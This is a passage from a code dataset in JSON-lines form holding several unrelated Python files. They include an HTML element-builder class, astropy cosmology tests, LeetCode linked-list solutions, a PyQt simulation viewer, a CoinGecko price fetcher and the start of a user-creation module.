{}\n ok_attrs = None\n # 'separate_close' is True for most Elements but False for tags like 'br' which are\n # self-contatined and so don't require a separate closing tag.\n #\n separate_close = True\n dented = True\n\n def __init__(self, tag=None, separate_close=None, children=[], **sArgs):\n self.tag = tag\n self.sArgs = sArgs\n self.children = children[:]\n if separate_close is not None: # use None for 'no overrule'\n self.separate_close = separate_close\n\n def __call__(self, **args):\n \"\"\"\nThis functions makes it possible to derive tags with attributes by calling the tag with\narguments, e.g. 'h.img(src='picture.jpg')'.\nBeware: this looks like a simple instance creation but isn't; h.img already returns an\ninstance so the bracketed construction gets routed to this function.\nThis construction can be used with empty brackets to force a copy operation as opposed\nto just a name alias; i.e. 'my_table = h.table()' is kind of analogous to the following\n'trick' for lists: 'my_list = precious_list[:]'.\n \"\"\"\n if self.ok_attrs is None:\n if isinstance(self.attr_dict, dict):\n# Changed while extending phileas for HTML5: support single dictionary or list of dictionaries.\n self.ok_attrs = self.attr_dict\n else:\n self.ok_attrs = {}\n for d in self.attr_dict:\n self.ok_attrs.update(d)\n s_args = {}\n for key, val in args.items():\n key = key.lower().replace('_', '-')\n # print (self.ok_attrs.keys())\n if not key in self.ok_attrs.keys():\n raise KeyError(key)\n if not self.ok_attrs[key]:\n s_args[key] = key\n else:\n # the following statement is currently essentially\n # just a cheap and cheerful way to allow numeric\n # values to be specified without quotes; room for improvement here!\n s_args[key] = str(val)\n return self.__class__(tag=self.tag, separate_close=self.separate_close,\n **s_args)\n\n def _as_children(self, other):\n \"\"\"\nFunction '_as_children' is used internally by several public customization member function.\nIts purpose is to avoid unnecessary nesting of Elements when the child\nElement has not tag; in this case, its children can be taken on board by its new parent.\n \"\"\"\n return ((other is self or isinstance(other, self.__class__)) and other.tag is None\n and other.children or [other, ])\n\n def __or__(self, other):\n \"\"\"\nmember function '__or__' ensures that code like e.g. 'h.h4 | ',\nwhen converted to a string, results in '

expression

'.\nSimilarly 'h.a(href=\"myLink\") | \"text\"' becomes '
text'.\n \"\"\"\n return self.__class__(tag=self.tag, separate_close=self.separate_close,\n children=self._as_children(other), **self.sArgs)\n\n __ror__ = __or__\n \"\"\" \nThe above definition ensures that the '|' operator (see above) is symmetrical.\n \"\"\"\n\n def __ior__(self, other):\n \"\"\"\nMember function '__ior__' facilitates adding more child Elements to an\nalready defined html Element, using the '|=' in-place operator\n \"\"\"\n self.children.extend(self._as_children(other))\n return self\n\n def __and__(self, other):\n \"\"\"\nThis member function facilitates the use of & (usually a bit-wise 'and') to conditionally\napply HTML operators, e.g.:\n'(this_user==selected_user)&h.em | \"this is highlighted when it relates to selected user\"'.\n \"\"\"\n return self if other else self.__class__(tag=None, separate_close=False) # if false, return 'lame' html tag.\n\n __rand__ = __and__ # '&' operator is symmetrical\n\n def __add__(self, other):\n \"\"\"\nThis custom function was introduced very late in the development in order to\nfacilitate the use of '+' instead of ',' for concatenating Elements. This will\ndrastically reduce the amount of 'unravelling' when resolving complex nested\nHTML objects into strings.\n \"\"\"\n if not other:\n return self() # just return clone of self!\n\n return self.__class__(tag=None, separate_close=False,\n children=self._as_children(self)+self._as_children(other))\n\n def __radd__(self, other):\n \"\"\" note that our addition is not commutative!\n \"\"\"\n return self.__class__(tag=None, separate_close=False,\n children=self._as_children(other)+self._as_children(self))\n\n def __mul__(self, other):\n return sum([self for _ in range(other)], None)\n\n __rmul__ = __mul__ # multiplication is commutative; e.g. h.br*5 and 5*h.br are equivalent\n\n def __iter__(self):\n if self.tag is not None: # special case for 'orphan' Elements\n yield \"<%s\" % self.tag\n for key, val in self.sArgs.items():\n if val is not None:\n yield ' %s=\"%s\"' % (key.lower(), val)\n if not self.separate_close:\n yield '/'\n yield '>'\n yield from jitter(self.children)\n if self.separate_close:\n yield '' % self.tag\n if self.tag not in ('span', 'a'):\n yield '\\n'\n\n def join(self, seq):\n \"\"\"\nMember function 'join' ensures that the construction\n(e.g.) 'h.br.join(seq)' causes items of sequence to\nbe interspersed with blank lines when output. Items of the\nsequence with the value 'None' are ignored completely\n(but zero length strings are treated normally!)\n \"\"\"\n return self.__class__( tag=None, separate_close=False,\n children=(seq[:1] + [(self+term) for term in seq[1:]]))\n\n def __str__(self, glue=''):\n return glue.join(str(el) for el in self)","repo_name":"papahippo/phileas","sub_path":"phileas/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18587822301","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\"\"\"Testing :mod:`astropy.cosmology.core`.\"\"\"\n\nimport abc\nimport inspect\nimport pickle\n\nimport numpy as np\nimport pytest\n\nimport astropy.cosmology.units as cu\nimport astropy.units as u\nfrom astropy.cosmology import Cosmology, FlatCosmologyMixin\nfrom astropy.cosmology.core import _COSMOLOGY_CLASSES\nfrom astropy.cosmology.parameter import Parameter\nfrom astropy.cosmology.parameter.tests.test_descriptors import (\n ParametersAttributeTestMixin,\n)\nfrom astropy.cosmology.parameter.tests.test_parameter import ParameterTestMixin\nfrom astropy.cosmology.tests.test_connect import (\n ReadWriteTestMixin,\n ToFromFormatTestMixin,\n)\nfrom astropy.table import Column, QTable, Table\nfrom astropy.utils.compat import PYTHON_LT_3_11\n\n##############################################################################\n# SETUP / TEARDOWN\n\n\ndef make_valid_zs(max_z: float = 1e5):\n \"\"\"Make a list of valid redshifts for testing.\"\"\"\n # scalar\n scalar_zs = [\n 0,\n 1,\n min(1100, max_z), # interesting times\n # FIXME! np.inf breaks some funcs. 0 * inf is an error\n np.float64(min(3300, max_z)), # different type\n 2 * cu.redshift,\n 3 * u.one, # compatible units\n ]\n # array\n _zarr = np.linspace(0, min(1e5, max_z), num=20)\n array_zs = [\n _zarr, # numpy\n _zarr.tolist(), # pure python\n Column(_zarr), # table-like\n _zarr * cu.redshift, # Quantity\n ]\n return scalar_zs, _zarr, array_zs, scalar_zs + array_zs\n\n\nscalar_zs, z_arr, array_zs, valid_zs = make_valid_zs()\n\ninvalid_zs = [\n (None, TypeError), # wrong type\n # Wrong units (the TypeError is for the cython, which can differ)\n (4 * u.MeV, (u.UnitConversionError, TypeError)), # scalar\n ([0, 1] * u.m, (u.UnitConversionError, TypeError)), # array\n]\n\n\nclass SubCosmology(Cosmology):\n \"\"\"Defined here to be serializable.\"\"\"\n\n H0 = Parameter(unit=\"km/(s Mpc)\")\n Tcmb0 = Parameter(default=0 * u.K, unit=u.K)\n m_nu = Parameter(default=0 * u.eV, unit=u.eV)\n\n def __init__(self, H0, Tcmb0=0 * u.K, m_nu=0 * u.eV, name=None, meta=None):\n super().__init__(name=name, meta=meta)\n self.H0 = H0\n self.Tcmb0 = Tcmb0\n self.m_nu = m_nu\n\n @property\n def is_flat(self):\n return super().is_flat()\n\n\n##############################################################################\n# TESTS\n##############################################################################\n\n\nclass MetaTestMixin:\n \"\"\"Tests for a :class:`astropy.utils.metadata.MetaData` on a Cosmology.\"\"\"\n\n def test_meta_on_class(self, cosmo_cls):\n assert cosmo_cls.meta is None\n\n def test_meta_on_instance(self, cosmo):\n assert isinstance(cosmo.meta, dict) # test type\n # value set at initialization\n assert cosmo.meta == self.cls_kwargs.get(\"meta\", {})\n\n def test_meta_mutable(self, cosmo):\n \"\"\"The metadata is NOT immutable on a cosmology\"\"\"\n key = next(iter(cosmo.meta.keys())) # select some key\n cosmo.meta[key] = cosmo.meta.pop(key) # will error if immutable\n\n\nclass CosmologyTest(\n ParameterTestMixin,\n ParametersAttributeTestMixin,\n MetaTestMixin,\n ReadWriteTestMixin,\n ToFromFormatTestMixin,\n metaclass=abc.ABCMeta,\n):\n \"\"\"Test subclasses of :class:`astropy.cosmology.Cosmology`.\"\"\"\n\n @abc.abstractmethod\n def setup_class(self):\n \"\"\"Setup for testing.\"\"\"\n\n def teardown_class(self):\n pass\n\n @property\n def cls_args(self):\n return tuple(self._cls_args.values())\n\n @pytest.fixture(scope=\"class\")\n def cosmo_cls(self):\n \"\"\"The Cosmology class as a :func:`pytest.fixture`.\"\"\"\n return self.cls\n\n @pytest.fixture(scope=\"function\") # ensure not cached.\n def ba(self):\n \"\"\"Return filled `inspect.BoundArguments` for cosmology.\"\"\"\n ba = self.cls._init_signature.bind(*self.cls_args, **self.cls_kwargs)\n ba.apply_defaults()\n return ba\n\n @pytest.fixture(scope=\"class\")\n def cosmo(self, cosmo_cls):\n \"\"\"The cosmology instance with which to test.\"\"\"\n ba = self.cls._init_signature.bind(*self.cls_args, **self.cls_kwargs)\n ba.apply_defaults()\n return cosmo_cls(*ba.args, **ba.kwargs)\n\n # ===============================================================\n # Method & Attribute Tests\n\n # ---------------------------------------------------------------\n # class-level\n\n def test_init_subclass(self, cosmo_cls):\n \"\"\"Test creating subclasses registers classes and manages Parameters.\"\"\"\n\n # -----------------------------------------------------------\n # Normal subclass creation\n\n class InitSubclassTest(cosmo_cls):\n pass\n\n # test parameters\n assert InitSubclassTest.parameters == cosmo_cls.parameters\n\n # test and cleanup registry\n registrant = _COSMOLOGY_CLASSES.pop(InitSubclassTest.__qualname__)\n assert registrant is InitSubclassTest\n\n # -----------------------------------------------------------\n # Skip\n\n class UnRegisteredSubclassTest(cosmo_cls):\n @classmethod\n def _register_cls(cls):\n \"\"\"Override to not register.\"\"\"\n\n assert UnRegisteredSubclassTest.parameters == cosmo_cls.parameters\n assert UnRegisteredSubclassTest.__qualname__ not in _COSMOLOGY_CLASSES\n\n def test_init_signature(self, cosmo_cls, cosmo):\n \"\"\"Test class-property ``_init_signature``.\"\"\"\n # test presence\n assert hasattr(cosmo_cls, \"_init_signature\")\n assert hasattr(cosmo, \"_init_signature\")\n\n # test internal consistency, so following tests can use either cls or instance.\n assert cosmo_cls._init_signature == cosmo._init_signature\n\n # test matches __init__, but without 'self'\n sig = inspect.signature(cosmo.__init__) # (instances don't have self)\n assert set(sig.parameters) == set(cosmo._init_signature.parameters)\n assert all(\n np.all(sig.parameters[k].default == p.default)\n for k, p in cosmo._init_signature.parameters.items()\n )\n\n # ---------------------------------------------------------------\n # instance-level\n\n def test_init(self, cosmo_cls):\n \"\"\"Test initialization.\"\"\"\n # Cosmology only does name and meta, but this subclass adds H0 & Tcmb0.\n cosmo = cosmo_cls(*self.cls_args, name=\"test_init\", meta={\"m\": 1})\n assert cosmo.name == \"test_init\"\n assert cosmo.meta[\"m\"] == 1\n\n # if meta is None, it is changed to a dict\n cosmo = cosmo_cls(*self.cls_args, name=\"test_init\", meta=None)\n assert cosmo.meta == {}\n\n def test_name(self, cosmo):\n \"\"\"Test property ``name``.\"\"\"\n assert cosmo.name is cosmo._name # accesses private attribute\n assert cosmo.name is None or isinstance(cosmo.name, str) # type\n assert cosmo.name == self.cls_kwargs[\"name\"] # test has expected value\n\n # immutable\n match = (\n \"can't set\"\n if PYTHON_LT_3_11\n else f\"property 'name' of {cosmo.__class__.__name__!r} object has no setter\"\n )\n with pytest.raises(AttributeError, match=match):\n cosmo.name = None\n\n @abc.abstractmethod\n def test_is_flat(self, cosmo_cls, cosmo):\n \"\"\"Test property ``is_flat``.\"\"\"\n\n # ------------------------------------------------\n # clone\n\n def test_clone_identical(self, cosmo):\n \"\"\"Test method ``.clone()`` if no (kw)args.\"\"\"\n assert cosmo.clone() is cosmo\n\n def test_clone_name(self, cosmo):\n \"\"\"Test method ``.clone()`` name argument.\"\"\"\n # test changing name. clone treats 'name' differently (see next test)\n c = cosmo.clone(name=\"cloned cosmo\")\n assert c.name == \"cloned cosmo\" # changed\n # show name is the only thing changed\n c._name = cosmo.name # first change name back\n assert c == cosmo\n assert c.meta == cosmo.meta\n\n # now change a different parameter and see how 'name' changes\n c = cosmo.clone(meta={\"test_clone_name\": True})\n assert c.name == cosmo.name + \" (modified)\"\n\n def test_clone_meta(self, cosmo):\n \"\"\"Test method ``.clone()`` meta argument: updates meta, doesn't clear.\"\"\"\n # start with no change\n c = cosmo.clone(meta=None)\n assert c.meta == cosmo.meta\n\n # add something\n c = cosmo.clone(meta=dict(test_clone_meta=True))\n assert c.meta[\"test_clone_meta\"] is True\n c.meta.pop(\"test_clone_meta\") # remove from meta\n assert c.meta == cosmo.meta # now they match\n\n def test_clone_change_param(self, cosmo):\n \"\"\"\n Test method ``.clone()`` changing a(many) Parameter(s).\n Nothing here b/c no Parameters.\n \"\"\"\n\n def test_clone_fail_unexpected_arg(self, cosmo):\n \"\"\"Test when ``.clone()`` gets an unexpected argument.\"\"\"\n with pytest.raises(TypeError, match=\"unexpected keyword argument\"):\n cosmo.clone(not_an_arg=4)\n\n def test_clone_fail_positional_arg(self, cosmo):\n with pytest.raises(TypeError, match=\"1 positional argument\"):\n cosmo.clone(None)\n\n # ---------------------------------------------------------------\n # comparison methods\n\n def test_is_equivalent(self, cosmo):\n \"\"\"Test :meth:`astropy.cosmology.Cosmology.is_equivalent`.\"\"\"\n # to self\n assert cosmo.is_equivalent(cosmo)\n\n # same class, different instance\n newclone = cosmo.clone(name=\"test_is_equivalent\")\n assert cosmo.is_equivalent(newclone)\n assert newclone.is_equivalent(cosmo)\n\n # different class and not convertible to Cosmology.\n assert not cosmo.is_equivalent(2)\n\n def test_equality(self, cosmo):\n \"\"\"Test method ``.__eq__().\"\"\"\n # wrong class\n assert (cosmo != 2) and (2 != cosmo)\n # correct\n assert cosmo == cosmo\n # different name <= not equal, but equivalent\n newcosmo = cosmo.clone(name=\"test_equality\")\n assert (cosmo != newcosmo) and (newcosmo != cosmo)\n assert cosmo.__equiv__(newcosmo) and newcosmo.__equiv__(cosmo)\n\n # ---------------------------------------------------------------\n\n def test_repr(self, cosmo_cls, cosmo):\n \"\"\"Test method ``.__repr__()``.\n\n This is a very general test and it is probably good to have a\n hard-coded comparison.\n \"\"\"\n r = repr(cosmo)\n\n # class in string rep\n assert cosmo_cls.__qualname__ in r\n assert r.index(cosmo_cls.__qualname__) == 0 # it's the first thing\n r = r[len(cosmo_cls.__qualname__) + 1 :] # remove\n\n # name in string rep\n if cosmo.name is not None:\n assert f\"name={cosmo.name!r}\" in r\n assert r.index(\"name=\") == 0\n r = r[6 + len(cosmo.name) + 3 :] # remove\n\n # parameters in string rep\n for k, v in cosmo.parameters.items():\n sv = f\"{k}={v!r}\"\n assert sv in r\n assert r.index(k) == 0\n r = r[len(sv) + 2 :] # remove\n\n # ------------------------------------------------\n\n @pytest.mark.parametrize(\"in_meta\", [True, False])\n @pytest.mark.parametrize(\"table_cls\", [Table, QTable])\n def test_astropy_table(self, cosmo, table_cls, in_meta):\n \"\"\"Test ``astropy.table.Table(cosmology)``.\"\"\"\n tbl = table_cls(cosmo, cosmology_in_meta=in_meta)\n\n assert isinstance(tbl, table_cls)\n # the name & all parameters are columns\n for n in (\"name\", *cosmo.parameters):\n assert n in tbl.colnames\n assert np.all(tbl[n] == getattr(cosmo, n))\n # check if Cosmology is in metadata or a column\n if in_meta:\n assert tbl.meta[\"cosmology\"] == cosmo.__class__.__qualname__\n assert \"cosmology\" not in tbl.colnames\n else:\n assert \"cosmology\" not in tbl.meta\n assert tbl[\"cosmology\"][0] == cosmo.__class__.__qualname__\n # the metadata is transferred\n for k, v in cosmo.meta.items():\n assert np.all(tbl.meta[k] == v)\n\n # ===============================================================\n # Usage Tests\n\n def test_immutability(self, cosmo):\n \"\"\"\n Test immutability of cosmologies.\n The metadata is mutable: see ``test_meta_mutable``.\n \"\"\"\n for n in (*cosmo.parameters, *cosmo._derived_parameters):\n with pytest.raises(AttributeError):\n setattr(cosmo, n, getattr(cosmo, n))\n\n def test_pickle_class(self, cosmo_cls, pickle_protocol):\n \"\"\"Test classes can pickle and unpickle.\"\"\"\n # pickle and unpickle\n f = pickle.dumps(cosmo_cls, protocol=pickle_protocol)\n unpickled = pickle.loads(f)\n\n # test equality\n assert unpickled == cosmo_cls\n\n def test_pickle_instance(self, cosmo, pickle_protocol):\n \"\"\"Test instances can pickle and unpickle.\"\"\"\n # pickle and unpickle\n f = pickle.dumps(cosmo, protocol=pickle_protocol)\n with u.add_enabled_units(cu):\n unpickled = pickle.loads(f)\n\n assert unpickled == cosmo\n assert unpickled.meta == cosmo.meta\n\n\nclass TestCosmology(CosmologyTest):\n \"\"\"Test :class:`astropy.cosmology.Cosmology`.\n\n Subclasses should define tests for:\n\n - ``test_clone_change_param()``\n - ``test_repr()``\n \"\"\"\n\n def setup_class(self):\n \"\"\"\n Setup for testing.\n Cosmology should not be instantiated, so tests are done on a subclass.\n \"\"\"\n # make sure SubCosmology is known\n _COSMOLOGY_CLASSES[\"SubCosmology\"] = SubCosmology\n\n self.cls = SubCosmology\n self._cls_args = dict(\n H0=70 * (u.km / u.s / u.Mpc), Tcmb0=2.7 * u.K, m_nu=0.6 * u.eV\n )\n self.cls_kwargs = dict(name=self.__class__.__name__, meta={\"a\": \"b\"})\n\n def teardown_class(self):\n \"\"\"Teardown for testing.\"\"\"\n super().teardown_class(self)\n _COSMOLOGY_CLASSES.pop(\"SubCosmology\", None)\n\n # ===============================================================\n # Method & Attribute Tests\n\n def test_is_flat(self, cosmo_cls, cosmo):\n \"\"\"Test property ``is_flat``. It's an ABC.\"\"\"\n with pytest.raises(NotImplementedError, match=\"is_flat is not implemented\"):\n cosmo.is_flat\n\n\n# -----------------------------------------------------------------------------\n\n\nclass FlatCosmologyMixinTest:\n \"\"\"Tests for :class:`astropy.cosmology.core.FlatCosmologyMixin` subclasses.\n\n The test suite structure mirrors the implementation of the tested code.\n Just like :class:`astropy.cosmology.FlatCosmologyMixin` is an abstract\n base class (ABC) that cannot be used by itself, so too is this corresponding\n test class an ABC mixin.\n\n E.g to use this class::\n\n class TestFlatSomeCosmology(FlatCosmologyMixinTest, TestSomeCosmology):\n ...\n \"\"\"\n\n def test_nonflat_class_(self, cosmo_cls, cosmo):\n \"\"\"Test :attr:`astropy.cosmology.core.FlatCosmologyMixin.nonflat_cls`.\"\"\"\n # Test it's a method on the class\n assert issubclass(cosmo_cls, cosmo_cls.__nonflatclass__)\n\n # It also works from the instance. # TODO! as a \"metaclassmethod\"\n assert issubclass(cosmo_cls, cosmo.__nonflatclass__)\n\n # Maybe not the most robust test, but so far all Flat classes have the\n # name of their parent class.\n assert cosmo.__nonflatclass__.__name__ in cosmo_cls.__name__\n\n def test_is_flat(self, cosmo_cls, cosmo):\n \"\"\"Test property ``is_flat``.\"\"\"\n super().test_is_flat(cosmo_cls, cosmo)\n\n # it's always True\n assert cosmo.is_flat is True\n\n def test_nonflat(self, cosmo):\n \"\"\"Test :attr:`astropy.cosmology.core.FlatCosmologyMixin.nonflat`.\"\"\"\n assert cosmo.nonflat.is_equivalent(cosmo)\n assert cosmo.is_equivalent(cosmo.nonflat)\n\n # ------------------------------------------------\n # clone\n\n def test_clone_to_nonflat_equivalent(self, cosmo):\n \"\"\"Test method ``.clone()``to_nonflat argument.\"\"\"\n # just converting the class\n nc = cosmo.clone(to_nonflat=True)\n assert isinstance(nc, cosmo.__nonflatclass__)\n assert nc == cosmo.nonflat\n\n @abc.abstractmethod\n def test_clone_to_nonflat_change_param(self, cosmo):\n \"\"\"\n Test method ``.clone()`` changing a(many) Parameter(s). No parameters\n are changed here because FlatCosmologyMixin has no Parameters.\n See class docstring for why this test method exists.\n \"\"\"\n # send to non-flat\n nc = cosmo.clone(to_nonflat=True)\n assert isinstance(nc, cosmo.__nonflatclass__)\n assert nc == cosmo.nonflat\n\n # ------------------------------------------------\n\n def test_is_equivalent(self, cosmo):\n \"\"\"Test :meth:`astropy.cosmology.core.FlatCosmologyMixin.is_equivalent`.\n\n Normally this would pass up via super(), but ``__equiv__`` is meant\n to be overridden, so we skip super().\n e.g. FlatFLRWMixinTest -> FlatCosmologyMixinTest -> TestCosmology\n vs FlatFLRWMixinTest -> FlatCosmologyMixinTest -> TestFLRW -> TestCosmology\n \"\"\"\n CosmologyTest.test_is_equivalent(self, cosmo)\n\n # See FlatFLRWMixinTest for tests. It's a bit hard here since this class\n # is for an ABC.\n\n # ===============================================================\n # Usage Tests\n\n def test_subclassing(self, cosmo_cls):\n \"\"\"Test when subclassing a flat cosmology.\"\"\"\n\n class SubClass1(cosmo_cls):\n pass\n\n # The classes have the same non-flat parent class\n assert SubClass1.__nonflatclass__ is cosmo_cls.__nonflatclass__\n\n # A more complex example is when Mixin classes are used.\n class Mixin:\n pass\n\n class SubClass2(Mixin, cosmo_cls):\n pass\n\n # The classes have the same non-flat parent class\n assert SubClass2.__nonflatclass__ is cosmo_cls.__nonflatclass__\n\n # The order of the Mixin should not matter\n class SubClass3(cosmo_cls, Mixin):\n pass\n\n # The classes have the same non-flat parent class\n assert SubClass3.__nonflatclass__ is cosmo_cls.__nonflatclass__\n\n\ndef test__nonflatclass__multiple_nonflat_inheritance():\n \"\"\"\n Test :meth:`astropy.cosmology.core.FlatCosmologyMixin.__nonflatclass__`\n when there's more than one non-flat class in the inheritance.\n \"\"\"\n\n # Define a non-operable minimal subclass of Cosmology.\n class SubCosmology2(Cosmology):\n def __init__(self, H0, Tcmb0=0 * u.K, m_nu=0 * u.eV, name=None, meta=None):\n super().__init__(name=name, meta=meta)\n\n @property\n def is_flat(self):\n return False\n\n # Now make an ambiguous flat cosmology from the two SubCosmologies\n with pytest.raises(TypeError, match=\"cannot create a consistent non-flat class\"):\n\n class FlatSubCosmology(FlatCosmologyMixin, SubCosmology, SubCosmology2):\n @property\n def nonflat(self):\n pass\n","repo_name":"astropy/astropy","sub_path":"astropy/cosmology/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":19240,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"18204389782","text":"class Solution:\n def isPalindrome(self, head: ListNode) -> bool:\n def reverseList(head: ListNode) -> ListNode:\n prev = None\n curr = head\n\n while curr:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n\n return prev\n\n slow = head\n fast = head\n\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n\n if fast:\n slow = slow.next\n slow = reverseList(slow)\n\n while slow:\n if slow.val != head.val:\n return False\n slow = slow.next\n head = head.next\n\n return True\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0234. Palindrome Linked List/0234.py","file_name":"0234.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"3002492226","text":"class Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n \"\"\"\n n1 = len(l1)\n n2 = len(l2)\n O(max(n1, n2)) space O(max(n1, n2)) time\n \"\"\"\n class ListIter():\n def __init__(self, l: ListNode):\n self.l = ListNode(next=l)\n def __iter__(self):\n return self\n def __next__(self):\n self.l = self.l.next\n if self.l:\n return self.l.val\n raise StopIteration\n \n l3 = ListNode()\n li, rem = l3, False\n for n1, n2 in zip_longest(ListIter(l1), ListIter(l2)):\n li.next = ListNode()\n li = li.next\n s = (n1 if n1 else 0) + (n2 if n2 else 0) + rem\n li.val, rem = (s - 10, True) if s >= 10 else (s, False)\n if rem:\n li.next = ListNode(1)\n return l3.next","repo_name":"ayaskovets/leetcode","sub_path":"python/2.Add Two Numbers.py","file_name":"2.Add Two Numbers.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35298193763","text":"from .interface_widget import InterfaceWidget\nfrom ..simulation.bugworld import BugWorld\n\nfrom PyQt6.QtWidgets import (\n QMainWindow,\n)\nfrom PyQt6 import QtCore\n\nimport time\n\nclass SimulationThread(QtCore.QThread):\n iteration_done = QtCore.pyqtSignal(object)\n\n def __init__(self, parent, world):\n super().__init__(parent)\n self.world = world\n \n def run(self):\n while True:\n time.sleep(1)\n self.world.iterate_simulation()\n self.iteration_done.emit(self.world.get_state())\n\n\nclass WorldViewer(QMainWindow):\n def __init__(self, world):\n super().__init__()\n self.world = world\n \n self.interface_widget = InterfaceWidget(self.world.width, self.world.height)\n self.setCentralWidget(self.interface_widget)\n \n self.interface_widget.on_start_button(self.start_sim)\n \n self.simulation_thread = None\n \n\n def update_window(self):\n raise NotImplementedError()\n \n def on_iteration_ready(self, stuff):\n print(stuff)\n \n def start_sim(self):\n if self.simulation_thread is not None:\n print(\"Already running simulation\")\n return\n\n self.simulation_thread = SimulationThread(parent=self, world=self.world)\n self.simulation_thread.iteration_done.connect(self.on_iteration_ready)\n self.simulation_thread.start()\n ","repo_name":"frenebo/growers_and_eaters","sub_path":"src/scripts/view/worldviewer.py","file_name":"worldviewer.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26362702397","text":"def status(age):\n status = \"\"\n if (age == 1):\n status = \"in born\"\n elif (age >= 2 and age <= 10):\n status = \"child\"\n elif (age >= 11 and age <= 17):\n status = \"young\"\n elif (age >= 18 and age <= 49):\n status = \"adult\"\n elif (age >= 50 and age <= 79):\n status = \"old\"\n else:\n status = \"very old\"\n return status\n\nage = int(input(\"Enter the age: \"))\nprint(\"Status:\", status(age))","repo_name":"J16N/python-lab","sub_path":"Assignment-2/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24068605927","text":"from Library import Library\nfrom Book import Book\n\n# Create an instance of the Library class.\nmy_LIB = Library()\n\n# Add at least three book objects to the library.\nfirst_book = Book()\nfirst_book.title = \"Harry Potter\"\nfirst_book.author = \"J.K\"\nfirst_book.published_year = 2023\n\nsecond_book = Book()\nsecond_book.title = \"GOT\"\nsecond_book.author = \"John Snow\"\nsecond_book.published_year = 2023\n\n\nthird_book = Book()\nthird_book.title = \"Moonlight\"\nthird_book.author = \"Disney\"\nthird_book.published_year = 2023\n\n\nmy_LIB.add_book(first_book)\nmy_LIB.add_book(second_book)\nmy_LIB.add_book(third_book)\n\n# Display a list of available books in the library\nprint(my_LIB.list_available_books())\n\n# Check out one of the books\nmy_LIB.check_out_book(second_book)\n\n# Display the list of available books again.\nprint(my_LIB.list_available_books())\n\n# Return the checked-out book\nmy_LIB.return_book(second_book)\n\n# Display the list of available books once more\nprint(my_LIB.list_available_books())\n\nmy_LIB.check_out_book(third_book)\nprint(my_LIB.list_available_books())\n\nmy_LIB.check_out_book(third_book)\n\nmy_LIB.return_book(first_book)","repo_name":"dhee-tree/coding-challenges","sub_path":"01-LibrarySystem/LibrarySys.py","file_name":"LibrarySys.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37109451455","text":"import requests\nimport json\nfrom tqdm import tqdm\n\n\nwith open('symbol_to_coingecko_id.json') as f:\n coingecko_ids = json.loads(f.read()).values()\n\n\nwith open('coingecko_prices.json') as f:\n prices = json.loads(f.read())\n\nfor id in tqdm(coingecko_ids):\n if id in prices:\n continue\n try:\n response = requests.get(f'https://api.coingecko.com/api/v3/simple/price?ids={id}&vs_currencies=usd')\n if response.status_code == 429:\n print('Rate limited, exiting')\n break\n price = response.json()[id]['usd']\n prices[id] = price\n except Exception as e:\n print(f'For id {id} got exception {str(e)}')\n\nwith open('coingecko_prices.json', 'w') as f:\n f.write(json.dumps(prices, indent=4))\n ","repo_name":"nebolax/velodrome-v1-arbitrage-searcher","sub_path":"fetch_coingecko_prices.py","file_name":"fetch_coingecko_prices.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36753072185","text":"import logging\nfrom timeit import default_timer\n\n\nlogger = logging.getLogger()\nstream_handler = logging.StreamHandler()\nfile_handler = logging.FileHandler('logs_func.txt', mode='a', encoding=None, delay=False, errors=None)\nlogger.addHandler(stream_handler)\nlogger.addHandler(file_handler)\nlogger.setLevel(logging.DEBUG)\n\n\ndef execution_time(func):\n def delta_time(*args):\n t1 = default_timer()\n try:\n return func(*args)\n finally:\n delta = default_timer() - t1\n logging.info(f'Execution time: {delta}')\n return delta_time\n\n\n@execution_time\ndef factorize(*number):\n result = []\n num_list = []\n for num in number:\n for n in range(1, num+1):\n if num % n == 0:\n num_list.append(n)\n result.append(num_list)\n num_list = []\n return result\n raise NotImplementedError() # Remove after implementation\n\n\na, b, c, d = factorize(128, 255, 99999, 10651060)\nassert a == [1, 2, 4, 8, 16, 32, 64, 128]\nassert b == [1, 3, 5, 15, 17, 51, 85, 255]\nassert c == [1, 3, 9, 41, 123, 271, 369, 813, 2439, 11111, 33333, 99999]\nassert d == [1, 2, 4, 5, 7, 10, 14, 20, 28, 35, 70, 140, 76079, 152158, 304316, 380395, 532553, 760790, 1065106, 1521580, 2130212, 2662765, 5325530, 10651060]\n","repo_name":"Strategs/module23","sub_path":"task2_funk.py","file_name":"task2_funk.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20210239390","text":"from model import (db, connect_to_db, User, Section, SectionAssignment,\n Prompt, PromptAssignment, Response)\nimport server\nfrom datetime import datetime\nfrom monkeylearn import MonkeyLearn\nimport os\nfrom random import choice, random\nfrom flask_bcrypt import Bcrypt\n\nML_API_KEY = os.environ['MONKEYLEARN_KEY']\nml = MonkeyLearn(ML_API_KEY)\n\nbcrypt = Bcrypt(server.app)\n\n# 'create' functions\ndef create_user(first, last, email, password, g_id=None, g_credentials=None):\n if password is not None:\n hashed_password = bcrypt.generate_password_hash(password).decode('utf-8')\n else:\n hashed_password = None\n\n user = User(first_name=first,\n last_name=last,\n email=email,\n hashed_password=hashed_password,\n g_id=g_id,\n 